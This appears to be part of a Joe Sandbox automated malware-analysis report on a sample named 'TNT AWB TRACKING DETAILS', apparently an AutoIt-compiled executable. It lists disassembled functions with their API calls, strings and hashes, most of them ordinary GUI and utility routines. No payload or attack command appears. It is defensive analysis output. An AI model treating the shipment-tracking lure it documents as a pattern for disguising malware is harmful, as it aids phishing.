Part of subcall function 00B2A8CA: SelectObject.GDI32(?,00000000), ref: 00B2A964
Part of subcall function 00B2A8CA: SetBkColor.GDI32(?,00000000), ref: 00B2A96D
Part of subcall function 00B2A8CA: SelectObject.GDI32(?,?), ref: 00B2A97A
Part of subcall function 00B2A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00B2A999
Part of subcall function 00B2A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B2A9B0
Part of subcall function 00B2A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00B2A9C5
Part of subcall function 00B2A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B2A9ED

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: dfa75a52501a0e65d1f6b0d492a7c996a084798034ecfb8549897f89e96e597a
Instruction ID: 19efb4a6a7d6fb116576c9e4f51d6b3df65a38ebed44d96388ab5059cc4faa21
Opcode Fuzzy Hash: dfa75a52501a0e65d1f6b0d492a7c996a084798034ecfb8549897f89e96e597a
Instruction Fuzzy Hash: 32916D72408312AFC7219F64DC48E6B7BF9FB88321F100B29F966971A0DB75D946CB52

Function 00B174AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00B174DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B1759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B175DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B175ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B17633
GetClientRect.USER32(00000000,?), ref: 00B1763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B17683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B17692
GetStockObject.GDI32(00000011), ref: 00B176A2
SelectObject.GDI32(00000000,00000000), ref: 00B176A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B176B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B176BF
DeleteDC.GDI32(00000000), ref: 00B176C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B176F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 00B1770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B17746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B1775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 00B1776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B1779B
GetStockObject.GDI32(00000011), ref: 00B177A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B177B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B177BB

Strings

DISPLAY, xrefs: 00B17688
msctls_progress32, xrefs: 00B1773C
static, xrefs: 00B1767D, 00B17795
AutoIt v3, xrefs: 00B1762B

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: abd4116906a464bf1897dd38987d0bdab479d67c0e99de8865957a16d1c7df07
Instruction ID: 748af4e6743989daa68438d9848195178cfdf0f69ff1aa8b9868f29081f8bfa4
Opcode Fuzzy Hash: abd4116906a464bf1897dd38987d0bdab479d67c0e99de8865957a16d1c7df07
Instruction Fuzzy Hash: 45A16571A40615BFEB24DBA4DD4AFAF77B9EB05710F004154FA15A72E0CB74AD11CB60

Function 00B0AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B0AD1E
GetDriveTypeW.KERNEL32(?,00B2FAC0,?,\\.\,00B2F910), ref: 00B0ADFB
SetErrorMode.KERNEL32(00000000,00B2FAC0,?,\\.\,00B2F910), ref: 00B0AF59

Strings

Network, xrefs: 00B0AE39
SSA, xrefs: 00B0AEE2
ATAPI, xrefs: 00B0AECD
PhysicalDrive, xrefs: 00B0ADA7
SATA, xrefs: 00B0AF0C
RAID, xrefs: 00B0AEF7
Removable, xrefs: 00B0AE4D
Unknown, xrefs: 00B0AE1B, 00B0AEBF
ATA, xrefs: 00B0AED4
1394, xrefs: 00B0AEDB
Fixed, xrefs: 00B0AE43
SAS, xrefs: 00B0AF05
SCSI, xrefs: 00B0AEC6
\\.\, xrefs: 00B0AD70
Virtual, xrefs: 00B0AF21
iSCSI, xrefs: 00B0AEFE
CDROM, xrefs: 00B0AE2F
RAMDisk, xrefs: 00B0AE25
FileBackedVirtual, xrefs: 00B0AF28
USB, xrefs: 00B0AEF0
SSD, xrefs: 00B0AE86
Fibre, xrefs: 00B0AEE9
MMC, xrefs: 00B0AF1A

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 184c2c696d76f363d6878bdf1e89735b6a5456a36111f1b393f68e0e735af641
Instruction ID: fbbf1dcd26ee8882c032b85a09d4b5d6e2532cec888650fbd2356771307c945f
Opcode Fuzzy Hash: 184c2c696d76f363d6878bdf1e89735b6a5456a36111f1b393f68e0e735af641
Instruction Fuzzy Hash: C15142B0644306ABCB10EB20C992DBE7BE5EB49701B2049E6E807F72E1DB719D45DB52

Function 00AA68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00AA6931
__wcsnicmp.LIBCMT ref: 00AA6949
__wcsnicmp.LIBCMT ref: 00AA6961
__wcsnicmp.LIBCMT ref: 00AA6979
__wcsnicmp.LIBCMT ref: 00AA6991
__wcsnicmp.LIBCMT ref: 00AA69A9
__wcsnicmp.LIBCMT ref: 00AA69C1
__wcsnicmp.LIBCMT ref: 00AA69D5
__wcsnicmp.LIBCMT ref: 00AA6A16
__wcsnicmp.LIBCMT ref: 00AA6A2A
__wcsnicmp.LIBCMT ref: 00AA6A3E
__wcsnicmp.LIBCMT ref: 00AA6A52

Strings

#include-once, xrefs: 00AA698B
#ce, xrefs: 00AA6A4C
#cs, xrefs: 00AA69CF, 00AA6A24
#OnAutoItStartRegister, xrefs: 00AA6973
#comments-end, xrefs: 00AA6A38
Unterminated group of comments, xrefs: 00ADE403
#requireadmin, xrefs: 00AA695B
Cannot parse #include, xrefs: 00ADE3F0
Bad directive syntax error, xrefs: 00ADE31A
#comments-start, xrefs: 00AA69BB, 00AA6A10
#include, xrefs: 00AA69A3
#pragma compile, xrefs: 00AA692B
#notrayicon, xrefs: 00AA6943

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 5b6c50330dcb4d78bced3910d1d78a118727fbaacfe25559a238e07588d5486f
Instruction ID: eafbe07725fb2077549b0b3cfcf624ff89dc76cef124c81232b81ff2efbc8774
Opcode Fuzzy Hash: 5b6c50330dcb4d78bced3910d1d78a118727fbaacfe25559a238e07588d5486f
Instruction Fuzzy Hash: 0781D8B1640205AADF21FB60ED43FBF37B8AF16740F084029F906AF1D6EB61D945DA51

Function 00B29A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00B29AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B29B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00B29BA7

Strings

0, xrefs: 00B29BE4

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: c59c8f1eac2364b8030658f2e4e74f74c300fff047f08e5450d11894b282d7f1
Instruction ID: 00292fa9f67955be51ef7feb9626df47752bd9f08be567187b4dc6883bf9741e
Opcode Fuzzy Hash: c59c8f1eac2364b8030658f2e4e74f74c300fff047f08e5450d11894b282d7f1
Instruction Fuzzy Hash: 6702CD30104321AFD725CF24E989BBABBE5FF49310F0489ADF99D962A1CB74D845CB52

Function 00B2A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00B2A903
SetTextColor.GDI32(?,?), ref: 00B2A907
GetSysColorBrush.USER32(0000000F), ref: 00B2A91D
GetSysColor.USER32(0000000F), ref: 00B2A928
CreateSolidBrush.GDI32(?), ref: 00B2A92D
GetSysColor.USER32(00000011), ref: 00B2A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B2A953
SelectObject.GDI32(?,00000000), ref: 00B2A964
SetBkColor.GDI32(?,00000000), ref: 00B2A96D
SelectObject.GDI32(?,?), ref: 00B2A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00B2A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B2A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00B2A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B2A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B2AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00B2AA32
DrawFocusRect.USER32(?,?), ref: 00B2AA3D
GetSysColor.USER32(00000011), ref: 00B2AA4B
SetTextColor.GDI32(?,00000000), ref: 00B2AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B2AA67
SelectObject.GDI32(?,00B2A5FA), ref: 00B2AA7E
DeleteObject.GDI32(?), ref: 00B2AA89
SelectObject.GDI32(?,?), ref: 00B2AA8F
DeleteObject.GDI32(?), ref: 00B2AA94
SetTextColor.GDI32(?,?), ref: 00B2AA9A
SetBkColor.GDI32(?,?), ref: 00B2AAA4

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 1d8f1a50216cae144dd8f03d0ed9a62e766434bfda9881eea477ac6c9c72b972
Instruction ID: d8282f7ff43b5a16737509013ca7c2e89c69ec68387714928d7c00d8159da335
Opcode Fuzzy Hash: 1d8f1a50216cae144dd8f03d0ed9a62e766434bfda9881eea477ac6c9c72b972
Instruction Fuzzy Hash: F5515A71900219FFDB219FA4DC48EAEBBB9FF08320F114265F915AB2A1DB759941CF90

Function 00B289D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B28AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B28AD2
CharNextW.USER32(0000014E), ref: 00B28B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B28B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B28B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B28B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B28B86
SetWindowTextW.USER32(?,0000014E), ref: 00B28BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B28BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B28C1F
_memset.LIBCMT ref: 00B28C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B28C8D
_memset.LIBCMT ref: 00B28CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B28D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00B28D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00B28E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00B28E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B28E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B28EB4
DrawMenuBar.USER32(?), ref: 00B28EC3
SetWindowTextW.USER32(?,0000014E), ref: 00B28EEB

Strings

0, xrefs: 00B28E55

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: ad94ff0649c56d3eb870c1b1cde8e6ac12778d36e7f0338653407886aa82e5ef
Instruction ID: 98c5024ec0f1ffa96bda860dfd89cc30d2b59d0081235342289d4cb502fbe386
Opcode Fuzzy Hash: ad94ff0649c56d3eb870c1b1cde8e6ac12778d36e7f0338653407886aa82e5ef
Instruction Fuzzy Hash: 8CE17070901229AFDB219F50DC84EFE7BB9EF09710F10819AF919AB290DF749985DF60

Function 00B2488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B249CA
GetDesktopWindow.USER32 ref: 00B249DF
GetWindowRect.USER32(00000000), ref: 00B249E6
GetWindowLongW.USER32(?,000000F0), ref: 00B24A48
DestroyWindow.USER32(?), ref: 00B24A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B24A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B24ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B24AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00B24AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B24B09
IsWindowVisible.USER32(?), ref: 00B24B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B24B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B24B58
GetWindowRect.USER32(?,?), ref: 00B24B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00B24B96
GetMonitorInfoW.USER32(00000000,?), ref: 00B24BB0
CopyRect.USER32(?,?), ref: 00B24BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00B24C32

Strings

tooltips_class32, xrefs: 00B24A96
(, xrefs: 00B24BA3
0, xrefs: 00B24975

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: a24f87e628a04293d97147f813030ddf3a2639e3beb2c88b795b386a6c85c637
Instruction ID: 200c55d325d8c71d8803e44cbdf9fe975688d65ab668ceaa9de81a47bd0f3c5a
Opcode Fuzzy Hash: a24f87e628a04293d97147f813030ddf3a2639e3beb2c88b795b386a6c85c637
Instruction Fuzzy Hash: 4DB19A70604351AFDB04DF64D988B6BBBE4FF89310F00896CF5999B2A1DB70E805CB95

Function 00B0449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B044AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B044D2
_wcscpy.LIBCMT ref: 00B04500
_wcscmp.LIBCMT ref: 00B0450B
_wcscat.LIBCMT ref: 00B04521
_wcsstr.LIBCMT ref: 00B0452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B04548
_wcscat.LIBCMT ref: 00B04591
_wcscat.LIBCMT ref: 00B04598
_wcsncpy.LIBCMT ref: 00B045C3

Strings

\VarFileInfo\Translation, xrefs: 00B04540
04090000, xrefs: 00B0457E
StringFileInfo\, xrefs: 00B0451B
DefaultLangCodepage, xrefs: 00B045AB
%u.%u.%u.%u, xrefs: 00B04626

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 71f6dbc2c3d27bec12c99a83bc1a61788fe0b71c0428c4ac2975e0cde7c2238f
Instruction ID: 50a7c724d162005346f3dfd2335f6dfc8f07e7bd8194e0dac0c6c8a5bf374799
Opcode Fuzzy Hash: 71f6dbc2c3d27bec12c99a83bc1a61788fe0b71c0428c4ac2975e0cde7c2238f
Instruction Fuzzy Hash: E741D372940201BADB11AA749D43FBF7BFCDF56710F0401EAFA05E6192EF35AA0186A5

Function 00AA27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AA28BC
GetSystemMetrics.USER32(00000007), ref: 00AA28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AA28EF
GetSystemMetrics.USER32(00000008), ref: 00AA28F7
GetSystemMetrics.USER32(00000004), ref: 00AA291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AA2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AA2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AA297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AA2990
GetClientRect.USER32(00000000,000000FF), ref: 00AA29AE
GetStockObject.GDI32(00000011), ref: 00AA29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA29D5

Part of subcall function 00AA2344: GetCursorPos.USER32(?), ref: 00AA2357
Part of subcall function 00AA2344: ScreenToClient.USER32(00B657B0,?), ref: 00AA2374
Part of subcall function 00AA2344: GetAsyncKeyState.USER32(00000001), ref: 00AA2399
Part of subcall function 00AA2344: GetAsyncKeyState.USER32(00000002), ref: 00AA23A7

SetTimer.USER32(00000000,00000000,00000028,00AA1256), ref: 00AA29FC

Strings

AutoIt v3 GUI, xrefs: 00AA2974

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 0bd304cc5553940e1ebc343ede7be0341eb0fd4094be2dc983ee054c40975cab
Instruction ID: 0b6dbd04325708f31edc7d924eecc45ef32048f8adf42d0cdb1abafa5cb9ce72
Opcode Fuzzy Hash: 0bd304cc5553940e1ebc343ede7be0341eb0fd4094be2dc983ee054c40975cab
Instruction Fuzzy Hash: 00B14071A0020AEFDB24DFA8DD45BAE7BB5FB08711F104229FA15E72E0DB749861CB50

Function 00AFA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00AFA47A
__swprintf.LIBCMT ref: 00AFA51B
_wcscmp.LIBCMT ref: 00AFA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00AFA583
_wcscmp.LIBCMT ref: 00AFA5BF
GetClassNameW.USER32(?,?,00000400), ref: 00AFA5F6
GetDlgCtrlID.USER32(?), ref: 00AFA648
GetWindowRect.USER32(?,?), ref: 00AFA67E
GetParent.USER32(?), ref: 00AFA69C
ScreenToClient.USER32(00000000), ref: 00AFA6A3
GetClassNameW.USER32(?,?,00000100), ref: 00AFA71D
_wcscmp.LIBCMT ref: 00AFA731
GetWindowTextW.USER32(?,?,00000400), ref: 00AFA757
_wcscmp.LIBCMT ref: 00AFA76B

Part of subcall function 00AC362C: _iswctype.LIBCMT ref: 00AC3634

Strings

%s%u, xrefs: 00AFA515

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: e29631f8507815673f729d057913e65743efbfca64e1aa28e08ec816f0697eaa
Instruction ID: e59c61c513bff17c3ed8a13cd50a8587fb3c8b124f4364879ed33336cf5a84be
Opcode Fuzzy Hash: e29631f8507815673f729d057913e65743efbfca64e1aa28e08ec816f0697eaa
Instruction Fuzzy Hash: E3A191B120420AAFD715EFA4C884FFAB7E8FF54355F008529FA99D2190DB30E955CB92

Function 00AFAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00AFAF18
_wcscmp.LIBCMT ref: 00AFAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00AFAF51
CharUpperBuffW.USER32(?,00000000), ref: 00AFAF6E
_wcscmp.LIBCMT ref: 00AFAF8C
_wcsstr.LIBCMT ref: 00AFAF9D
